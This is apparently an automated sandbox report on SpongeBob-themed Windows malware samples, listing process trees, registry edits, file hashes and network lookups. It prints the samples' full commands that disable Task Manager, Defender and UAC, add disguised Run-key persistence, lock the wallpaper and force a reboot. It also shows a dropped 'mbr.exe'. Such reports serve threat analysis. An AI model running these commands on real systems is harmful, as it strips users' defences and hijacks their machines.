PID 4732 wrote to memory of 3432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 1360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 1360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2872 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2872 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 1260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 1260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\49CA.tmp\49CB.tmp\49DC.vbs //Nologo

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mbr.exe

"C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mbr.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\49CA.tmp\tools.cmd" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\MainWindow.exe

"C:\Users\Admin\AppData\Local\Temp\49CA.tmp\MainWindow.exe"

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe

"C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2b4 0x3f0

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\49CB.tmp\49DC.vbs

MD5 b893c34dd666c3c4acef2e2974834a10
SHA1 2664e328e76c324fd53fb9f9cb64c24308472e82
SHA256 984a07d5e914ed0b2487b5f6035d6e8d97a40c23fa847d5fbf87209fee4c4bbc
SHA512 98a3413117e27c02c35322e17c83f529955b83e72f2af7caaaff53099b583cd241cec95e70c3c0d6d440cb22cf0109d4e46dfda09ef2480427e9a9ab7a4c866b

C:\Users\Admin\Desktop\SPONGEBOB_IS_WATCHING_YOU 5.txt

MD5 bb6d68d7181108015cd381c28360dfc4
SHA1 192c34b9cba6f9c4b742f2b70d9731b8ba2ac764
SHA256 aea8fb9235900760ac374c6a4a10fba62c2a0ef5bea2dd7ef4db70fe55e0b317
SHA512 e3d6bf8f6ae16daa235e2bc7ce64da5a76ff0155fa89942a4e9d3f10ce70229e081c5029a6b67702a6b14000f62e6c9188ba394ee7183d0667ddac9e0224f3f3

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mbr.exe

MD5 32fcbf41f490eade2e84c151bb70ec1b
SHA1 37d04455c86f9d53459b0ff8aafa1b90d4b8057f
SHA256 a1731bbc326d3a5a36b4ecd00bb46424003f064a3a4a74daafde08dd790bd789
SHA512 9606eeec8a8b2db12add5c5217761f027eee71a75374a18c7aa7a32987d08e43f8b1b56f457a810c2e6d52df21d407c4f0def8c01ca20c55af63b94d38251814

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mbr.exe

MD5 33bd7d68378c2e3aa4e06a6a85879f63
SHA1 00914180e1add12a7f6d03de29c69ad6da67f081
SHA256 6e79302d7ae9cc69e4fd1ba77bd4315d5e09f7a173b55ba823d6069a587a2e05
SHA512 b100e43fb45a2c8b6d31dd92a8ae9d8efea88977a62118547b4609cc7fe0e42efc25dc043bac4b20f662fab044c0ba007b322c77e66f0c791cc906eafc72fb95

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\tools.cmd

MD5 397c1a185b596e4d6a4a36c4bdcbd3b2
SHA1 054819dae87cee9b1783b09940a52433b63f01ae
SHA256 56c7054c00a849648d3681d08536dc56c0fb637f1f1ec3f9e102eace0a796a9f
SHA512 c2a77479ca0aa945826dccea75d5a7224c85b7b415fda802301be8a2305197276a33c48f82717faddb2a0ac58300f5b849a8c0dffb5a4443663c3dfd951d4e5c

memory/2028-221-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\bg.bmp

MD5 ce45a70d3cc2941a147c09264fc1cda5
SHA1 44cdf6c6a9ab62766b47caed1a6f832a86ecb6f9
SHA256 eceedadfde8506a73650cfa9a936e6a8fff7ffb664c9602bb14432aa2f8109ac
SHA512 d1bf6cdade55e9a7ce4243e41a696ae051835711f3d1e0f273ad3643f0b878266a8213cc13ca887a8181981ba4937350986e01e819b4bb109330718ef6251149

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe

MD5 e254e9598ee638c01e5ccc40e604938b
SHA1 541fa2a47f3caaae6aa8f5fbfe4d8aef0001905d
SHA256 4040ad3437e51139819148ed6378828adcfbd924251af39de8bf100a3a476a63
SHA512 92f129a52f2df1f8ed20156e838b79a13baf0cbcdd9c94a5c34f6639c714311f41eb3745fdcc64eac88ce3e6f27d25f9a3250f4ababc630eff7a89802e18b4bb

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mainbgtheme.wav

MD5 45c0e7067f628a4529aa3783f64c64ac
SHA1 759d187ac48eb566f820952fd304411eefa34e5f
SHA256 f4e8bb2473968d21ca4e49135d198b54f648c10ba86b71432206a5eb847e901e
SHA512 02168fda58fa80681bf96d72154c668d9e8a0b6caf2f209b900a654b7899eb0450e1181b2e7a65c33f8b0b01fcca9a6e8ce48713dd5ba473cd897293bd37ce63

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\MainWindow.exe

MD5 7c92316762d584133b9cabf31ab6709b
SHA1 7ad040508cef1c0fa5edf45812b7b9cd16259474
SHA256 01995c3715c30c0c292752448516b94485db51035c3a4f86eb18c147f10b6298
SHA512 f9fc7600c30cb11079185841fb15ee3ba5c33fff13979d5e69b2bae5723a0404177195d2e0bd28142356ff9b293850880b28322b2ce1ff9fe35e8961bb3f7be1

memory/4892-236-0x0000000000B60000-0x0000000000B82000-memory.dmp

memory/4892-240-0x0000000072EA0000-0x0000000073650000-memory.dmp

memory/4892-241-0x0000000005AD0000-0x0000000006074000-memory.dmp

memory/4892-242-0x00000000055C0000-0x0000000005652000-memory.dmp

memory/4892-243-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-244-0x0000000005A30000-0x0000000005A3A000-memory.dmp

memory/4892-245-0x0000000003090000-0x00000000030A0000-memory.dmp

C:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav

MD5 fe19696f3471d2061a753f8fda76705d
SHA1 eef7f784b9dfaa92b176e044cea93436628021ba
SHA256 36d8cc91e7a9f7ad912efbf35454dfbb4a32a3e3d93a729c9a977b0fe1eb7fac
SHA512 228fea13f5b3e00f9ec4e48c6c01db5c1cc26021131520e593beded7cc40fcc84725c483aa68403c482e8aba287a00f4f505ca9d17ad7244d1d381a7873c4447

C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_CE956E1FF8664E8C802A091BF3172C51.dat

MD5 064efbfcee2d19aa0c915ecb6fdf7c70
SHA1 15c03e83a9f15fd10d8d33b5b7806444838cbafc
SHA256 a90ef3274073451861a166ca1a172a8fdeb6e7ea4d493ffe2e628dc4be481d71
SHA512 5194080b4df0f06567ec04300290109731e3b4537ba8329d58578af2d2b840148a95440c6d18b6189f61b08b8d68427b43045260ed2e85baa008123db6a8c1c9

memory/4892-249-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-250-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-251-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-258-0x0000000072EA0000-0x0000000073650000-memory.dmp

memory/4892-263-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-266-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-271-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-274-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-279-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-284-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-287-0x0000000003090000-0x00000000030A0000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:54

Platform

win7-20231129-en

Max time kernel

7s

Max time network

10s

Command Line

"C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Disables Task Manager via registry modification

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" C:\Windows\SysWOW64\reg.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" C:\Windows\SysWOW64\reg.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3044 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 3068 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3068 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3068 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3068 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3068 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2576 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2576 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2576 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2576 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3068 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3068 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3068 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe

"C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\B76.tmp\HorrorBob2.bat" "

C:\Windows\SysWOW64\cscript.exe

cscript prompt.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

N/A

Files

memory/3044-0-0x0000000000400000-0x000000000132F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B76.tmp\HorrorBob2.bat

MD5 b11c0b55dba339bbe3169584fa0eedd8
SHA1 8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9
SHA256 f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073
SHA512 8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006

C:\Users\Admin\AppData\Local\Temp\B76.tmp\prompt.vbs

MD5 52ac951762c9b42fb4492dfdde2ba4ae
SHA1 0821a0dea46432fc4db10a2dc6312d42a872ab9f
SHA256 9bc399097468bb1f2f88250cb967b3db4d34d0a7836b73f262afe2b3ad393ba3
SHA512 c91cf111b92f0f3218353e4e1700270730f2cbad54ab5d8fb368c6e87168be39f0b3e5a04d66b11bc5d93d6b4c4d03711b75e29a7af87d75c14dd296ad4ad530

C:\Users\Admin\AppData\Local\Temp\B76.tmp\blood.bmp

MD5 436552127279e0e66663c24ed8edb8d6
SHA1 03df44401c9507a9014334a6cdbf92fd94697e30
SHA256 f478b856ac28b03a3ccf51f41b507edf1469c29018baecfba081b45c813447fa
SHA512 8ad79a8469c1c9d3461ef0ceb49123a2d2678e1db06b72995d2bc03b72ff46cf37167d7d434fa533f2565b96b3e28ae63d30d8a19efaa4e6222fc743828345f9

C:\Users\Admin\AppData\Local\Temp\B76.tmp\Service64.exe

MD5 db42ecfa07b2f2539b3def05e4d1700a
SHA1 1e7f7aac6e98ab81b16015f5f0b570c1396e76ce
SHA256 2c1e4b0af91abdd877f79572ff6535296f2c727148d4db4849259878b2ca6d21
SHA512 e9696444e6479699018291bdddeaa1e804dc37ad8455b274604f166d3f3e8586c0ff75cb089d9bebfa095719fb11ee1748fe9a8164bbb47cb8b55d61e1283ad0

memory/3044-29-0x0000000000400000-0x000000000132F000-memory.dmp

memory/2752-30-0x0000000002D90000-0x0000000002D91000-memory.dmp

memory/2696-31-0x0000000002B30000-0x0000000002B31000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

120s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\TempPE\Properties.Resources.Designer.cs.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\TempPE\Properties.Resources.Designer.cs.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

148s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\Bat_To_Exe_Converter.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\Bat_To_Exe_Converter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\Bat_To_Exe_Converter.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 104.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 32.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 udp
IE 52.111.236.21:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 211.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

memory/4568-0-0x0000000000400000-0x00000000004FA000-memory.dmp

memory/4568-5-0x0000000000400000-0x00000000004FA000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

161s

Command Line

